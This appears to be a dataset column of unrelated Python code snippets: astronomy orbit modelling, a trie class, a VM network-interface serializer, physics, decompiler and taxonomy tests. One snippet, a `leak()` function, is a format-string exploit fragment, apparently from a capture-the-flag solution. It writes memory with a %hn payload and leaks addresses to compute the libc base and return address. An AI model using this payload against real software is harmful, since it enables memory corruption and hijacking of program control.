code stringlengths 281 23.7M |
|---|
(reason='Commenting these out while we have `transaction_search_gold` vs `transaction_search` in the TABLE_SPEC as by design the data in delta will be different from the data in postgres')
_db(transaction=True)
def test_load_table_to_from_delta_for_transaction_search_testing(spark, s3_unittest_data_bucket, populate_usas_data_and_recipients_from_broker, hive_unittest_metastore_db):
pass |
class TTVOrbit(KeplerianOrbit):
def __init__(self, *args, **kwargs):
ttvs = kwargs.pop('ttvs', None)
transit_times = kwargs.pop('transit_times', None)
transit_inds = kwargs.pop('transit_inds', None)
if ((ttvs is None) and (transit_times is None)):
raise ValueError("one of 'ttvs' or 'transit_times' must be defined")
if (ttvs is not None):
self.ttvs = [as_tensor_variable(ttv, ndim=1) for ttv in ttvs]
if (transit_inds is None):
self.transit_inds = [tt.arange(ttv.shape[0]) for ttv in self.ttvs]
else:
self.transit_inds = [tt.cast(as_tensor_variable(inds, ndim=1), 'int64') for inds in transit_inds]
else:
self.transit_times = []
self.ttvs = []
self.transit_inds = []
period = []
t0 = []
for (i, times) in enumerate(transit_times):
times = as_tensor_variable(times, ndim=1)
if (transit_inds is None):
inds = tt.arange(times.shape[0])
else:
inds = tt.cast(as_tensor_variable(transit_inds[i]), 'int64')
self.transit_inds.append(inds)
N = times.shape[0]
sumx = tt.sum(inds)
sumx2 = tt.sum((inds ** 2))
sumy = tt.sum(times)
sumxy = tt.sum((inds * times))
denom = ((N * sumx2) - (sumx ** 2))
slope = (((N * sumxy) - (sumx * sumy)) / denom)
intercept = (((sumx2 * sumy) - (sumx * sumxy)) / denom)
expect = (intercept + (inds * slope))
period.append(slope)
t0.append(intercept)
self.ttvs.append((times - expect))
self.transit_times.append(times)
kwargs['t0'] = tt.stack(t0)
self.ttv_period = tt.stack(period)
if ('period' not in kwargs):
if ('delta_log_period' in kwargs):
kwargs['period'] = tt.exp((tt.log(self.ttv_period) + kwargs.pop('delta_log_period')))
else:
kwargs['period'] = self.ttv_period
super(TTVOrbit, self).__init__(*args, **kwargs)
if (ttvs is not None):
self.ttv_period = self.period
self.transit_times = [((self.t0[i] + (self.period[i] * self.transit_inds[i])) + ttv) for (i, ttv) in enumerate(self.ttvs)]
self.all_transit_times = []
for (i, inds) in enumerate(self.transit_inds):
expect = (self.t0[i] + (self.period[i] * tt.arange((inds.max() + 1))))
self.all_transit_times.append(tt.set_subtensor(expect[inds], self.transit_times[i]))
self._bin_edges = [tt.concatenate(([(tts[0] - (0.5 * self.ttv_period[i]))], (0.5 * (tts[1:] + tts[:(- 1)])), [(tts[(- 1)] + (0.5 * self.ttv_period[i]))])) for (i, tts) in enumerate(self.all_transit_times)]
self._bin_values = [tt.concatenate(([tts[0]], tts, [tts[(- 1)]])) for (i, tts) in enumerate(self.all_transit_times)]
def _get_model_dt(self, t):
vals = []
for i in range(len(self.ttvs)):
inds = tt.extra_ops.searchsorted(self._bin_edges[i], t)
vals.append(self._bin_values[i][inds])
return tt.stack(vals, (- 1))
def _warp_times(self, t, _pad=True):
if _pad:
return (tt.shape_padright(t) - self._get_model_dt(t))
return (t - self._get_model_dt(t)) |
def leak():
global libc_base, ret_addr
delete(2)
payload = ((('%' + str(2617)) + 'c%13$hn') + '%31$p%33$p')
payload = payload.ljust(116, 'A').ljust(128, '\x00')
payload += (p64(0) + p64(337))
edit(1, payload)
submit(p64(6295992))
io.recvuntil('0x')
leak_addr1 = int(io.recv(12), 16)
libc_base = ((leak_addr1 - 240) - libc.symbols['__libc_start_main'])
io.recvuntil('0x')
leak_addr2 = int(io.recv(12), 16)
ret_addr = (leak_addr2 - 496)
log.info(('leak_addr1: 0x%x' % leak_addr1))
log.info(('leak_addr2: 0x%x' % leak_addr2))
log.info(('libc_base: 0x%x' % libc_base))
log.info(('ret_addr: 0x%x' % ret_addr)) |
class HexaryTrieFog():
_unexplored_prefixes: GenericSortedSet[Nibbles]
def __init__(self) -> None:
self._unexplored_prefixes = SortedSet({()})
def __repr__(self) -> str:
return f'HexaryTrieFog<{self._unexplored_prefixes!r}>'
def is_complete(self) -> bool:
return (len(self._unexplored_prefixes) == 0)
def explore(self, old_prefix_input: NibblesInput, foggy_sub_segments: Sequence[NibblesInput]) -> 'HexaryTrieFog':
old_prefix = Nibbles(old_prefix_input)
sub_segments = [Nibbles(segment) for segment in foggy_sub_segments]
new_fog_prefixes = self._unexplored_prefixes.copy()
try:
new_fog_prefixes.remove(old_prefix)
except KeyError:
raise ValidationError(f'Old parent {old_prefix} not found in {new_fog_prefixes!r}')
if (len(set(sub_segments)) != len(sub_segments)):
raise ValidationError(f'Got duplicate sub_segments in {sub_segments} to HexaryTrieFog.explore()')
all_lengths = set((len(segment) for segment in sub_segments))
if (len(all_lengths) > 1):
for segment in sub_segments:
shorter_lengths = [length for length in all_lengths if (length < len(segment))]
for check_length in shorter_lengths:
trimmed_segment = segment[:check_length]
if (trimmed_segment in sub_segments):
raise ValidationError(f'Cannot add {segment} which is a child of segment {trimmed_segment}')
new_fog_prefixes.update([(old_prefix + segment) for segment in sub_segments])
return self._new_trie_fog(new_fog_prefixes)
def mark_all_complete(self, prefix_inputs: Sequence[NibblesInput]) -> 'HexaryTrieFog':
new_unexplored_prefixes = self._unexplored_prefixes.copy()
for prefix in map(Nibbles, prefix_inputs):
if (prefix not in new_unexplored_prefixes):
raise ValidationError(f'When marking {prefix} complete, could not find in {new_unexplored_prefixes!r}')
new_unexplored_prefixes.remove(prefix)
return self._new_trie_fog(new_unexplored_prefixes)
def nearest_unknown(self, key_input: NibblesInput=()) -> Nibbles:
key = Nibbles(key_input)
index = self._unexplored_prefixes.bisect(key)
if (index == 0):
try:
return self._unexplored_prefixes[0]
except IndexError as exc:
raise PerfectVisibility('There are no more unexplored prefixes') from exc
elif (index == len(self._unexplored_prefixes)):
return self._unexplored_prefixes[(- 1)]
else:
nearest_left = self._unexplored_prefixes[(index - 1)]
nearest_right = self._unexplored_prefixes[index]
left_distance = self._prefix_distance(nearest_left, key)
right_distance = self._prefix_distance(key, nearest_right)
if (left_distance < right_distance):
return nearest_left
else:
return nearest_right
def nearest_right(self, key_input: NibblesInput) -> Nibbles:
key = Nibbles(key_input)
index = self._unexplored_prefixes.bisect(key)
if (index == 0):
try:
return self._unexplored_prefixes[0]
except IndexError as exc:
raise PerfectVisibility('There are no more unexplored prefixes') from exc
else:
nearest_left = self._unexplored_prefixes[(index - 1)]
if key_starts_with(key, nearest_left):
return nearest_left
else:
try:
return self._unexplored_prefixes[index]
except IndexError as exc:
raise FullDirectionalVisibility(f'There are no unexplored prefixes to the right of {key}') from exc
_tuple
def _prefix_distance(low_key: Nibbles, high_key: Nibbles) -> Iterable[int]:
for (low_nibble, high_nibble) in zip_longest(low_key, high_key, fillvalue=None):
if (low_nibble is None):
final_low_nibble = 15
else:
final_low_nibble = low_nibble
if (high_nibble is None):
final_high_nibble = 0
else:
final_high_nibble = high_nibble
(yield (final_high_nibble - final_low_nibble))
def _new_trie_fog(cls, unexplored_prefixes: SortedSet) -> 'HexaryTrieFog':
copy = cls()
copy._unexplored_prefixes = unexplored_prefixes
return copy
def serialize(self) -> bytes:
prefixes = [encode_nibbles(nibbles) for nibbles in self._unexplored_prefixes]
return f'HexaryTrieFog:{prefixes!r}'.encode()
def deserialize(cls, encoded: bytes) -> 'HexaryTrieFog':
serial_prefix = b'HexaryTrieFog:'
if (not encoded.startswith(serial_prefix)):
raise ValueError(f'Cannot deserialize this into HexaryTrieFog object: {encoded!r}')
else:
encoded_list = encoded[len(serial_prefix):]
prefix_list = ast.literal_eval(encoded_list.decode())
deserialized_prefixes = SortedSet((Nibbles(decode_nibbles(prefix)) for prefix in prefix_list))
return cls._new_trie_fog(deserialized_prefixes)
def __eq__(self, other: Any) -> bool:
if (not isinstance(other, HexaryTrieFog)):
return False
else:
return (self._unexplored_prefixes == other._unexplored_prefixes) |
class VmDefineNicSerializer(s.Serializer):
mac = s.MACAddressField(required=False)
model = s.ChoiceField(choices=Vm.NIC_MODEL, default=settings.VMS_NIC_MODEL_DEFAULT)
net = s.CharField()
ip = s.IPAddressField(required=False)
netmask = s.IPAddressField(read_only=True)
gateway = s.IPAddressField(read_only=True)
primary = s.BooleanField(default=False)
dns = s.BooleanField(default=False)
use_net_dns = s.BooleanField(default=False)
allow_dhcp_spoofing = s.BooleanField(default=False)
allow_ip_spoofing = s.BooleanField(default=False)
allow_mac_spoofing = s.BooleanField(default=False)
allow_restricted_traffic = s.BooleanField(default=False)
allow_unfiltered_promisc = s.BooleanField(default=False)
allowed_ips = s.IPAddressArrayField(default=list(), max_items=NIC_ALLOWED_IPS_MAX)
monitoring = s.BooleanField(default=False)
set_gateway = s.BooleanField(default=True)
mtu = s.IntegerField(read_only=True, required=False)
def __init__(self, request, vm, *args, **kwargs):
self.request = request
self.vm = vm
self.dc_settings = dc_settings = vm.dc.settings
self.nic_id = kwargs.pop('nic_id', None)
self.resolvers = vm.resolvers
self._dns = []
self._net = None
self._net_old = None
self._ip = None
self._ip_old = None
self._ips = ()
self._ips_old = ()
self._changing_allowed_ips = False
self._monitoring_old = None
if (len(args) > 0):
if isinstance(args[0], list):
data = map(self.fix_before, args[0])
else:
data = self.fix_before(args[0])
super(VmDefineNicSerializer, self).__init__(data, *args[1:], **kwargs)
else:
super(VmDefineNicSerializer, self).__init__(*args, **kwargs)
if (self.nic_id == 0):
self.fields['dns'].default = True
self.fields['primary'].default = True
if (self.nic_id == (dc_settings.VMS_NIC_MONITORING_DEFAULT - 1)):
self.fields['monitoring'].default = True
if ((self.nic_id is not None) and vm.template):
for (field, value) in vm.template.get_vm_define_nic(self.nic_id).items():
try:
self.fields[field].default = value
except KeyError:
pass
if vm.is_kvm():
self.fields['model'].default = dc_settings.VMS_NIC_MODEL_DEFAULT
else:
self.fields['model'].default = 'virtio'
def fix_before(self, data):
if data.get('network_uuid', None):
try:
self._net = Subnet.objects.get(uuid=data['network_uuid'])
data['net'] = self._net.name
except Subnet.DoesNotExist:
raise APIError(detail='Unknown net in NIC definition.')
else:
del data['network_uuid']
else:
data['net'] = None
if ('vlan_id' not in data):
data['vlan_id'] = 0
if ('mtu' not in data):
data['mtu'] = None
if ('primary' not in data):
data['primary'] = False
ip = data.get('ip', None)
if ip:
try:
if (self._net and self._net.dhcp_passthrough and (ip == 'dhcp')):
data['ip'] = ip = None
data['netmask'] = None
data['gateway'] = None
self._ip = False
else:
self._ip = IPAddress.objects.get(ip=ip, subnet=self._net)
except IPAddress.DoesNotExist:
raise APIError(detail='Unknown ip in NIC definition.')
allowed_ips = data.get('allowed_ips', None)
if (allowed_ips is not None):
self._ips = IPAddress.objects.filter(ip__in=allowed_ips, subnet=self._net)
data['allowed_ips'] = list(set(allowed_ips))
data['dns'] = False
if (ip and self.vm.hostname_is_valid_fqdn()):
dns = RecordView.Record.get_records_A(self.vm.hostname, self.vm.fqdn_domain)
if dns:
for record in dns:
if (record.content == ip):
self._dns.append(record)
data['dns'] = True
if (self._net and (self._net.get_resolvers() == self.vm.resolvers)):
data['use_net_dns'] = True
else:
data['use_net_dns'] = False
self._monitoring_old = (self.vm.monitoring_ip == ip)
if self._monitoring_old:
data['monitoring'] = True
else:
data['monitoring'] = False
data['set_gateway'] = bool(data.get('gateway', None))
return data
def jsondata(self):
data = dict(self.object)
if ('net' in data):
subnet = data.pop('net')
if subnet:
data['network_uuid'] = str(self._net.uuid)
data.pop('dns', None)
data.pop('use_net_dns', None)
data.pop('monitoring', None)
data.pop('set_gateway', None)
if ((not data.get('ip')) and self._net.dhcp_passthrough):
data['ip'] = 'dhcp'
data.pop('netmask', None)
data.pop('gateway', None)
return data
def detail_dict(self, **kwargs):
ret = super(VmDefineNicSerializer, self).detail_dict(**kwargs)
ret.pop('nic_id', None)
if (self._net_old or (self._ip_old is not None)):
ret['ip'] = self.object.get('ip', None)
ret['netmask'] = self.object.get('netmask', None)
ret['gateway'] = self.object.get('gateway', None)
ret['allowed_ips'] = self.object.get('allowed_ips', [])
return ret
def validate_mac(self, attrs, source):
try:
value = attrs[source]
except KeyError:
pass
else:
if (self.object and self.vm.is_deployed()):
if ((not value) or (self.object.get('mac', None) != value)):
raise s.ValidationError(_('Cannot change MAC address.'))
return attrs
def validate_set_gateway(self, attrs, source):
try:
value = attrs[source]
except KeyError:
pass
else:
if (self.object and self.vm.is_deployed() and (self.object.get('set_gateway', None) != value)):
raise s.ValidationError(_('Cannot change gateway.'))
return attrs
def _validate_insecure_boolean_attr(self, attrs, source):
try:
value = attrs[source]
except KeyError:
return attrs
if ((not self.request.user.is_staff) and value):
raise s.ValidationError(PERMISSION_DENIED)
return attrs
def validate_allow_dhcp_spoofing(self, attrs, source):
return self._validate_insecure_boolean_attr(attrs, source)
def validate_allow_ip_spoofing(self, attrs, source):
return self._validate_insecure_boolean_attr(attrs, source)
def validate_allow_mac_spoofing(self, attrs, source):
return self._validate_insecure_boolean_attr(attrs, source)
def validate_allow_restricted_traffic(self, attrs, source):
return self._validate_insecure_boolean_attr(attrs, source)
def validate_allow_unfiltered_promisc(self, attrs, source):
return self._validate_insecure_boolean_attr(attrs, source)
def validate_primary(self, attrs, source):
try:
value = attrs[source]
except KeyError:
pass
else:
if ((value is True) and (self.nic_id is not None)):
other_nics = self.vm.json_get_nics()
if other_nics:
try:
del other_nics[self.nic_id]
except IndexError:
pass
for n in other_nics:
if (n.get('primary', False) is True):
raise s.ValidationError(_('Cannot enable primary flag on multiple NICs.'))
return attrs
def validate_net(self, attrs, source):
try:
value = attrs[source]
except KeyError:
pass
else:
if value:
if (self.object and self._net and (self._net.name == value)):
return attrs
try:
_net = get_subnets(self.request).get(name=value)
except Subnet.DoesNotExist:
raise s.ObjectDoesNotExist(value)
else:
if (_net.access in Subnet.UNUSABLE):
raise s.ObjectDoesNotExist(value)
if self.vm.node:
validate_nic_tags(self.vm, new_net=_net)
if (self.object and (self._net != _net)):
self._net_old = self._net
if ((self.object.get('mtu', None) and (_net.mtu is None)) or _net.vxlan_id):
raise s.ValidationError(_('This field cannot be changed because some inherited NIC attributes (MTU, nic_tag) cannot be updated. Please remove the NIC and add a new NIC.'))
self._net = _net
return attrs
def _check_ip_usage(self, ipaddress, allowed_ips=False):
ip = ipaddress.ip
if ((ipaddress.usage == IPAddress.VM_REAL) and (ipaddress.vm == self.vm)):
if (ipaddress.ip in self.vm.json_get_ips()):
return (_('Object with name=%s is already used.') % ip)
else:
if (ipaddress.vm is not None):
return (_('Object with name=%s is already used as default address.') % ip)
if allowed_ips:
if (ipaddress.usage not in (IPAddress.VM, IPAddress.VM_REAL)):
return (_('Object with name=%s is not available.') % ip)
for other_vm in ipaddress.vms.exclude(uuid=self.vm.uuid):
if (other_vm.dc != self.vm.dc):
return (_('Object with name=%s is already used as additional address in another virtual datacenter.') % ip)
else:
if (ipaddress.usage != IPAddress.VM):
return (_('Object with name=%s is not available.') % ip)
if ipaddress.vms.exists():
return (_('Object with name=%s is already used as additional address.') % ip)
return None
def validate(self, attrs):
net = self._net
assert net
if (('ip' in attrs) and attrs['ip']):
ip = attrs['ip']
if (self.object and (not self._net_old) and self._ip and (self._ip.ip == ip)):
pass
else:
try:
_ip = IPAddress.objects.get(ip=ip, subnet=net)
except IPAddress.DoesNotExist:
self._errors['ip'] = s.ObjectDoesNotExist(ip).messages
return attrs
else:
error = self._check_ip_usage(_ip)
if error:
self._errors['ip'] = s.ErrorList([error])
return attrs
if (self._ip and (self._ip != _ip)):
self._ip_old = self._ip
self._ip = _ip
attrs['ip'] = self._ip.ip
elif (self._net_old or (not attrs.get('ip', True))):
self._ip_old = self._ip
self._ip = None
allowed_ips = list(set(attrs.get('allowed_ips', [])))
if allowed_ips:
_ips = IPAddress.objects.filter(ip__in=allowed_ips, subnet=net)
if (self.object and (not self._net_old) and self._ips and (self._ips == _ips)):
pass
else:
ip_list = _ips.values_list('ip', flat=True)
if (len(ip_list) != len(allowed_ips)):
self._errors['allowed_ips'] = s.ErrorList([(_('Object with name=%s does not exist.') % i) for i in allowed_ips if (i not in ip_list)])
return attrs
if (self._ip and (self._ip.ip in allowed_ips)):
self._errors['allowed_ips'] = s.ErrorList([_('The default IP address must not be among allowed_ips.')])
return attrs
errors = [err for err in (self._check_ip_usage(ipaddress, allowed_ips=True) for ipaddress in _ips) if (err is not None)]
if errors:
self._errors['allowed_ips'] = s.ErrorList(errors)
return attrs
if (self._ips and (self._ips != _ips)):
self._ips_old = self._ips.exclude(ip__in=ip_list)
self._ips = _ips
self._changing_allowed_ips = True
attrs['allowed_ips'] = list(set(ip_list))
elif (self._ips and (self._net_old or ('allowed_ips' in attrs))):
attrs['allowed_ips'] = list()
self._ips_old = self._ips
self._ips = ()
self._changing_allowed_ips = True
if net.dhcp_passthrough:
try:
dns = attrs['dns']
except KeyError:
dns = self.object['dns']
try:
monitoring = attrs['monitoring']
except KeyError:
monitoring = self.object['monitoring']
if (dns or monitoring):
if dns:
self._errors['dns'] = s.ErrorList([_('Cannot enable DNS for externally managed network.')])
if monitoring:
self._errors['monitoring'] = s.ErrorList([_('Cannot enable monitoring for externally managed network.')])
return attrs
if (not self._ip):
if net.dhcp_passthrough:
self._ip = False
attrs['ip'] = None
attrs['netmask'] = None
attrs['gateway'] = None
else:
try:
self._ip = IPAddress.objects.filter(subnet=net, vm__isnull=True, vms=None, usage=IPAddress.VM).exclude(ip__in=allowed_ips).order_by('?')[0:1].get()
except IPAddress.DoesNotExist:
raise s.ValidationError((_('Cannot find free IP address for net %s.') % net.name))
else:
logger.info('IP address %s for NIC ID %s on VM %s was chosen automatically', self._ip, self.nic_id, self.vm)
attrs['ip'] = self._ip.ip
if (self._ip is not False):
assert (self._ip and attrs.get('ip', True))
attrs['netmask'] = net.netmask
attrs['gateway'] = net.gateway
try:
set_gateway = attrs['set_gateway']
except KeyError:
set_gateway = self.object['set_gateway']
if (not set_gateway):
attrs['gateway'] = None
attrs['vlan_id'] = net.vlan_id
if net.vxlan_id:
attrs['nic_tag'] = ('%s/%s' % (net.nic_tag, net.vxlan_id))
else:
attrs['nic_tag'] = net.nic_tag
attrs['mtu'] = net.mtu
if ('use_net_dns' in attrs):
if attrs['use_net_dns']:
self.resolvers = net.get_resolvers()
elif self.object:
self.resolvers = self.dc_settings.VMS_VM_RESOLVERS_DEFAULT
return attrs
_api_exception
def save_a(request, task_id, vm, ip, dns=(), delete=False):
if (not vm.dc.settings.DNS_ENABLED):
logger.info('DNS support disabled: skipping DNS A record saving for vm %s', vm)
return None
if (not vm.hostname_is_valid_fqdn()):
logger.warn('Valid domain for vm %s not found. Could not %s DNS A record.', vm, ('delete' if delete else 'add'))
return None
record_cls = RecordView.Record
ip = str(ip.ip)
domain = vm.fqdn_domain
logger.info('%s DNS A record for vm %s, domain %s, name %s.', ('Deleting' if delete else 'Adding/Updating'), vm, domain, ip)
if (not dns):
dns = record_cls.get_records_A(vm.hostname, domain)
if delete:
method = 'DELETE'
data = {}
else:
records_exist = [(record.content == ip) for record in dns]
if (records_exist and all(records_exist)):
logger.info('DNS A record for vm %s, domain %s, name %s already exists.', vm, domain, ip)
return True
if len(dns):
method = 'PUT'
data = {'content': ip}
else:
method = 'POST'
dns = (record_cls(domain=RecordView.internal_domain_get(domain, task_id=task_id)),)
data = {'type': record_cls.A, 'name': vm.hostname.lower(), 'domain': domain, 'content': ip}
for record in dns:
RecordView.internal_response(request, method, record, data, task_id=task_id, related_obj=vm)
return True
_api_exception
def save_ptr(request, task_id, vm, ip, net, delete=False, content=None):
dc_settings = vm.dc.settings
if (not dc_settings.DNS_ENABLED):
logger.info('DNS support disabled: skipping DNS PTR record saving for vm %s', vm)
return None
record_cls = RecordView.Record
ipaddr = str(ip.ip)
ptr = record_cls.get_record_PTR(ipaddr, net.ptr_domain)
logger.info('%s DNS PTR record for vm %s, domain %s, name %s.', ('Deleting' if delete else 'Adding'), vm, net.ptr_domain, ipaddr)
def default_ptr(server, ip_address):
placeholders = {'hostname': server.hostname, 'alias': server.alias, 'ipaddr': ip_address.replace('.', '-')}
try:
return dc_settings.DNS_PTR_DEFAULT.format(**placeholders)
except (KeyError, ValueError, TypeError) as e:
logger.error('Could not convert DNS_PTR_DEFAULT (%s) for IP %s of VM %s. Error was: %s', dc_settings.DNS_PTR_DEFAULT, ip_address, server, e)
return 'ptr-{ipaddr}.example.com'.format(**placeholders)
if ptr:
if delete:
method = 'DELETE'
data = {}
else:
method = 'PUT'
data = {'content': (content or default_ptr(vm, ipaddr))}
elif delete:
return None
else:
ptr = record_cls(domain=RecordView.internal_domain_get(net.ptr_domain, task_id=task_id))
method = 'POST'
data = {'type': record_cls.PTR, 'domain': net.ptr_domain, 'name': record_cls.get_reverse(ipaddr, net.ptr_domain), 'content': (content or default_ptr(vm, ipaddr))}
return RecordView.internal_response(request, method, ptr, data, task_id=task_id, related_obj=vm)
def _remove_vm_ip_association(vm, ip, many=False):
logger.info('Removing association of IP %s with vm %s.', ip, vm)
if ((ip.usage == IPAddress.VM_REAL) and vm.is_deployed()):
logger.info(' ^ Removal of association of IP %s with vm %s will be delayed until PUT vm_manage is done.', ip, vm)
elif many:
ip.vms.remove(vm)
else:
ip.vm = None
ip.save()
def _create_vm_ip_association(vm, ip, many=False):
logger.info('Creating association of IP %s with vm %s.', ip, vm)
if ip.vm:
raise APIError(detail='Unexpected problem with IP address association.')
if many:
ip.vms.add(vm)
else:
ip.vm = vm
ip.save()
def _update_vm_ip_association(cls, vm, ip, delete=False, many=False):
if delete:
cls._remove_vm_ip_association(vm, ip, many=many)
else:
cls._create_vm_ip_association(vm, ip, many=many)
def save_ip(self, task_id, delete=False, update=False):
vm = self.vm
ip = self._ip
ip_old = self._ip_old
if (ip is False):
assert self._net.dhcp_passthrough
else:
assert ip
if ((not update) or ip_old):
if ip_old:
self._remove_vm_ip_association(vm, ip_old)
if ip:
self._update_vm_ip_association(vm, ip, delete=delete)
if (ip_old and ip_old.subnet.ptr_domain):
self.save_ptr(self.request, task_id, vm, ip_old, ip_old.subnet, delete=True)
if (ip and self._net and self._net.ptr_domain):
self.save_ptr(self.request, task_id, vm, ip, self._net, delete=delete)
if self._changing_allowed_ips:
for _ip_old in self._ips_old:
self._remove_vm_ip_association(vm, _ip_old, many=True)
for _ip in self._ips:
self._update_vm_ip_association(vm, _ip, delete=delete, many=True)
dns = self.object['dns']
remove_dns = (self._dns and (not dns))
if (dns or remove_dns):
if remove_dns:
delete = True
if (delete and ip_old):
ip = ip_old
if ip:
self.save_a(self.request, task_id, vm, ip, dns=self._dns, delete=delete)
return ip
def update_ip(self, task_id):
return self.save_ip(task_id, update=True)
def delete_ip(self, task_id):
return self.save_ip(task_id, delete=True)
def data(self):
if (self._data is None):
data = super(VmDefineNicSerializer, self).data
if self.many:
for (i, nic) in enumerate(data):
nic['nic_id'] = (i + 1)
else:
data['nic_id'] = self.nic_id
try:
data['nic_id'] += 1
except TypeError:
pass
self._data = data
return self._data
def get_monitoring_ip(self, delete=False):
monitoring = self.object['monitoring']
ip = self.object['ip']
if (self._ip is False):
assert self._net.dhcp_passthrough
assert (not monitoring)
else:
assert self._ip
if (self._monitoring_old and (delete or (not monitoring))):
logger.info('Removing monitoring IP %s for vm %s.', ip, self.vm)
return ''
elif monitoring:
logger.info('Saving monitoring IP %s for vm %s.', ip, self.vm)
return ip
else:
return None |
def test_medium_dispersion_create():
m_PR = td.PoleResidue(eps_inf=1.0, poles=[(((- 1) + 2j), (1 + 3j)), (((- 2) + 4j), (1 + 5j))])
m_SM = td.Sellmeier(coeffs=[(2, 3), (2, 4)])
m_LZ = td.Lorentz(eps_inf=1.0, coeffs=[(1, 3, 2), (2, 4, 1)])
m_LZ2 = td.Lorentz(eps_inf=1.0, coeffs=[(1, 2, 3), (2, 1, 4)])
m_DR = td.Drude(eps_inf=1.0, coeffs=[(1, 3), (2, 4)])
m_DB = td.Debye(eps_inf=1.0, coeffs=[(1, 3), (2, 4)])
for medium in [m_PR, m_SM, m_DB, m_LZ, m_DR, m_LZ2]:
_ = td.Structure(geometry=td.Box(size=(1, 1, 1)), medium=medium) |
def wrong_answer_count(start_date):
if ah.user_settings['keep_log']:
ah.log.debug('Begin function')
dbScore = mw.col.db.scalar('\n select\n count()\n from revlog where\n ease = 1 and\n id/1000 > ?\n ', start_date)
if ah.user_settings['keep_log']:
ah.log.debug(('End function returning: %s' % dbScore))
return dbScore |
def test_phi_function_in_head2():
u1 = Variable('u', Integer.int32_t(), 1)
u2 = Variable('u', Integer.int32_t(), 2)
v0 = Variable('v', Integer.int32_t(), 0)
v1 = Variable('v', Integer.int32_t(), 1)
node = BasicBlock(0, [Phi(u1, [v0, u2]), Phi(v1, [v0, u1]), Assignment(u2, BinaryOperation(OperationType.plus, [u1, v1]))])
node.instructions[0]._origin_block = {None: v0, node: u2}
node.instructions[1]._origin_block = {None: v0, node: u1}
cfg = ControlFlowGraph()
cfg.add_node(node)
cfg.add_edges_from([UnconditionalEdge(node, node)])
liveness_analysis = LivenessAnalysis(cfg)
assert (liveness_analysis._uses_phi_block[None] == {v0})
assert ((liveness_analysis.live_in_of(node) == {v1, u1}) and (liveness_analysis.live_out_of(node) == {u2, u1})) |
class Test_gtdbquery(unittest.TestCase):
def test_00_update_database(self):
gtdb = GTDBTaxa()
url = '
print(f'Downloading GTDB database release 202 to {DEFAULT_GTDBTAXADUMP} from {url}')
with open(DEFAULT_GTDBTAXADUMP, 'wb') as f:
f.write(requests.get(url).content)
gtdb.update_taxonomy_database(DEFAULT_GTDBTAXADUMP)
if (not os.path.exists(DATABASE_PATH)):
gtdbquery.update_db(DATABASE_PATH)
def test_01tree_annotation(self):
tree = PhyloTree('((c__Alicyclobacillia, c__Bacilli), s__Caballeronia udeis);', sp_naming_function=(lambda name: name))
tree.annotate_gtdb_taxa(dbfile=DATABASE_PATH, taxid_attr='name')
self.assertEqual(tree.props.get('sci_name'), 'd__Bacteria')
firmicutes = tree['c__Bacilli'].up
self.assertEqual(firmicutes.props.get('taxid'), 'p__Firmicutes')
self.assertEqual(firmicutes.props.get('sci_name'), 'p__Firmicutes')
self.assertEqual(firmicutes.props.get('rank'), 'phylum')
self.assertEqual(firmicutes.props.get('named_lineage'), ['root', 'd__Bacteria', 'p__Firmicutes'])
caballeronia = tree['s__Caballeronia udeis']
self.assertEqual(caballeronia.props.get('taxid'), 's__Caballeronia udeis')
self.assertEqual(caballeronia.props.get('sci_name'), 's__Caballeronia udeis')
self.assertEqual(caballeronia.props.get('rank'), 'species')
self.assertEqual(caballeronia.props.get('named_lineage'), ['root', 'd__Bacteria', 'p__Proteobacteria', 'c__Gammaproteobacteria', 'o__Burkholderiales', 'f__Burkholderiaceae', 'g__Caballeronia', 's__Caballeronia udeis'])
def test_02tree_annotation(self):
tree = PhyloTree('((GB_GCA_.1,RS_GCF_.1),(GB_GCA_.1),(GB_GCA_.1));', sp_naming_function=(lambda name: name))
tree.annotate_gtdb_taxa(dbfile=DATABASE_PATH, taxid_attr='species')
self.assertEqual(tree.props.get('sci_name'), 'g__Korarchaeum')
cryptofilum = tree['GB_GCA_.1'].up
self.assertEqual(cryptofilum.props.get('taxid'), 's__Korarchaeum cryptofilum')
self.assertEqual(cryptofilum.props.get('sci_name'), 's__Korarchaeum cryptofilum')
self.assertEqual(cryptofilum.props.get('rank'), 'species')
self.assertEqual(cryptofilum.props.get('named_lineage'), ['root', 'd__Archaea', 'p__Thermoproteota', 'c__Korarchaeia', 'o__Korarchaeales', 'f__Korarchaeaceae', 'g__Korarchaeum', 's__Korarchaeum cryptofilum'])
sp = tree['GB_GCA_.1']
self.assertEqual(sp.props.get('taxid'), 'GB_GCA_.1')
self.assertEqual(sp.props.get('sci_name'), 's__Korarchaeum sp')
self.assertEqual(sp.props.get('rank'), 'subspecies')
self.assertEqual(sp.props.get('named_lineage'), ['root', 'd__Archaea', 'p__Thermoproteota', 'c__Korarchaeia', 'o__Korarchaeales', 'f__Korarchaeaceae', 'g__Korarchaeum', 's__Korarchaeum sp', 'GB_GCA_.1'])
def test_03tree_annotation(self):
tree = PhyloTree('((GB_GCA_.1|protA,RS_GCF_.1|protB),(GB_GCA_.1|protC),(GB_GCA_.1|protD));', sp_naming_function=(lambda name: name.split('|')[0]))
tree.annotate_gtdb_taxa(taxid_attr='species')
self.assertEqual(tree.props.get('sci_name'), 'g__Korarchaeum')
cryptofilum = tree['GB_GCA_.1|protA'].up
self.assertEqual(cryptofilum.props.get('taxid'), 's__Korarchaeum cryptofilum')
self.assertEqual(cryptofilum.props.get('sci_name'), 's__Korarchaeum cryptofilum')
self.assertEqual(cryptofilum.props.get('rank'), 'species')
self.assertEqual(cryptofilum.props.get('named_lineage'), ['root', 'd__Archaea', 'p__Thermoproteota', 'c__Korarchaeia', 'o__Korarchaeales', 'f__Korarchaeaceae', 'g__Korarchaeum', 's__Korarchaeum cryptofilum'])
sp = tree['GB_GCA_.1|protC']
self.assertEqual(sp.props.get('taxid'), 'GB_GCA_.1')
self.assertEqual(sp.props.get('sci_name'), 's__Korarchaeum sp')
self.assertEqual(sp.props.get('rank'), 'subspecies')
self.assertEqual(sp.props.get('named_lineage'), ['root', 'd__Archaea', 'p__Thermoproteota', 'c__Korarchaeia', 'o__Korarchaeales', 'f__Korarchaeaceae', 'g__Korarchaeum', 's__Korarchaeum sp', 'GB_GCA_.1'])
def test_04tree_annotation(self):
tree = PhyloTree('((protA:1, protB:1):1,(protC:1),(protD:1):1):1;')
annotate_dict = {'protA': 'GB_GCA_.1', 'protB': 'RS_GCF_.1', 'protC': 'GB_GCA_.1', 'protD': 'GB_GCA_.1'}
for (key, value) in annotate_dict.items():
tree[key].add_prop('gtdb_spcode', value)
tree.annotate_gtdb_taxa(taxid_attr='gtdb_spcode')
self.assertEqual(tree.props.get('sci_name'), 'g__Korarchaeum')
